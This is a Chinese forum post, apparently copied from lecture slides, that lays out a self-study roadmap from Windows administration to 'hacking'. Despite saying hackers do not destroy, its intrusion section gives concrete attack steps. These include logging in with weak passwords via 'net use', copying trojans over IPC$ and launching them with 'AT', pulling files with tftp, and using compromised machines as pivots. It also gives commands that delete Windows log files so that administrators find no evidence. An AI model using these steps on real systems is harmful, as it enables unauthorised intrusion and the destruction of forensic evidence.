如何去学习
•要有学习目标
•要有学习计划
•要有正确的心态
•要有很强的自学能力
•最重要的是要有恒心(持之以恒)
学习目标
•1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等)
•2.自己目前的水平和能力有多高
――――――――――――――――――――――――――――――――――――――
•能简单操作windows2000,XP
•能简单配置windows2000,XP的一些服务
•能熟练的配置Windows2000,XP的各种服务
•能熟练配置win2000和各种网络设备联网
•能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
•能配置cicso,huawei,3com,朗迅等网络设备
•会简单编写C/C++,Delphi,Java,PB,VB,Perl
•能简单编写Asp,Php,Cgi和script,shell脚本
――――――――――――――――――――――――――――――――――――――
•3.必须学会不相信态度,尊重各种各样的能力
•不要为那些装模做样的人浪费时间
•尊重别人的能力
•谦虚做人,踏实做事
•会享受提高自己能力的乐趣.
•在知道了自己的水平和能力之后就要开始自己的目标了
•--------安全专家
•--------黑客
•--------高级程序员
•黑客是建设网络,不是破坏网络, 破坏者是骇客;
•黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的;
•因为懂得如何入侵才知道如何维护
•因为懂得如何维护才更要了解如何入侵
•这是 黑客与安全专家的联系
•但,他们都是在会编程的基础上成长的!
•红客,是中国黑客爱国主意者新鲜的代表,他们以技术保护祖为己任对抗国外的黑客攻击。
制定学习计划
一、 基础
1、 系统安装:(先前的WIN98我们就不在研究了,会装win2000、XP,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2000可以在安装的时候分区,格式化硬盘,
2、 了解开机、关机、待机、注销的原理和作用
3、 配置上网,知道IP地址,子网掩码,网关和MAC的区别
4、 知道win2000、XP下面各主要目录的作用 Documents and Settings,WINNT,WINDOWS,system32 Program Files文件夹的含意。
5、 认识和操作注册表
6、 关于组策略
7、 常用dos命令
8、 远程控制
9、 系统清理与优化
10、 简单防病毒
11、 单机防火墙
二、 进阶
1、 熟悉win2000或者2003 SERVER操作系统。
2、 IIS信息服务
3、 FTP文件服务
4、 DNS服务
5、 DHCP服务
6、 路由和远程访问服务
7、 DFS分布式文件共享
8、 磁盘管理
9、 路由器的安装与简单配置
10、 配置常见的企业级防火墙
三、 高级
1、 域管理网络
2、 ISA防火墙上网管理
3、 企业邮箱系统
4、 企业网站系统
5、 SQL数据库维护
6、 企业网络反病毒
7、 三层交换机配置
8、 服务器安全
9、 IIS安全
10、 SERV-U安全
四、 专业
1. 入侵检测(IDS)
2. 入侵防御系统(HIPS)
3. 社会工程学
4. 黑客
•自己编写专用的黑客工具
•自己发现系统漏洞
黑客入侵手段
•收集信息:
• 收集要入侵的目标信息
• IP,域名,端口,漏洞,位置
弱口令
•在nt\2000\xp\2003中弱口令可以用
•Net use \ip “password” /user:user
•如果目标机开3389服务,可以直接连接
•在sql的sa弱口令,可以用sql连接器直接 •登陆
后门木马
•如果有ipc$共享,可以copy过去木马后门
•用at启动
•AT \ip time /INTERACTIVE
•如果可以得到shell,也可以用tftp
•Tftp.exe ?i ip get *.* *.*
•然后直接安装 •如果有3389,可以自己建一个iis,下载 直接运行
密码破解
•远程破解mysql,mssql,ftp,mail,共享密码
•本地破解管理员(administrator)密码
缓冲溢出
•可以用缓冲溢出攻击,
•比如流行的webdev,rdcom模块漏洞
•可以直接得到system管理权限
•缓冲溢出后的一般现象是:
•Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Web服务漏洞
•例如:
•Unicode漏洞遍历磁盘和执行程序
•二次编码漏洞遍历磁盘和执行程序
•.HTR漏洞查看源代码
嗅探监听
•例如:
•针对web监听
•针对mail监听
•工具如:sinffer , iris
欺骗攻击
•例如:
•运用arp欺骗攻击
伪装欺骗
•常见的如:mail病毒
•把一个文件改名字甚至图标,欺骗对方执行
社会工程学
•例如:
•QQ聊天*****
•EMAIL信息
•电话
•*****
拒绝服务
•例如:
•Dos攻击
•Ddos攻击
利用跳板
•利用自己的肉鸡作为跳板攻击别的机器
•My PC------>跳板(肉鸡)--->目标
路由器漏洞
•如:
•原始密码
•程序漏洞
防火墙
•利用欺骗攻击防火墙,导致防火墙功能失效
•利用防火墙的模块漏洞
unix/linux
•NetWare Linux unix solais Solaris hp-unix Aix 等
•这些目前先不讲解
精通黑客工具
•必须有一套自己可以完全掌握的黑客工具
•如端口扫描 Nscan,bluescanport
•监听工具:sinffer iris
•telnet工具:nc
•扫描工具:sss,nmap, LANguard
•后门工具:radmin,winshell
•密码破解:lc4
•远程管理:pcanywhere
•会使用各种经典的黑客工具
清除日志
•在你入侵机器以后,离开的时候,要完全清除
•自己在那台机器上留下的痕迹
•例如清除
•Del C:\WINNT\system32\LogFiles\*.*
•Del C:\WINNT\system32\*.log
•Del C:\WINNT\system32\*.txt
•Del C:\WINNT\*.log
•Del c:\winnt\*.txt
如果你不清除日志
•当目标机器的管理员发现你的证据
•完全可以让你在大墙内渡过一段日子
黑客
•当你完全掌握这些后
•你就成为了一名小黑客
高级
•编写自己的黑客工具
•发现系统漏洞
高级黑客
•目前你足以成为一个高级黑客了
真正的黑客
•精通各种网络协议
•精通操作系统
•精通编程技术
•精通安全防护
•不搞破坏
•挑战技术难题
结束
•想学好这些,并不是靠别人给你的,而是靠自己的努力,自己的自学得到的!
•别人只能指导你,怎么去做,只能告诉方法,
•真正的实施是你自己,经过N*N个日夜努力换来的
•不要一个问题问多次,要多动手,动脑!
•Google里面有太多的答案,为什么我搜索不到?因为你的关键字用的不对! |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
使用道具 举报
使用道具 举报
使用道具 举报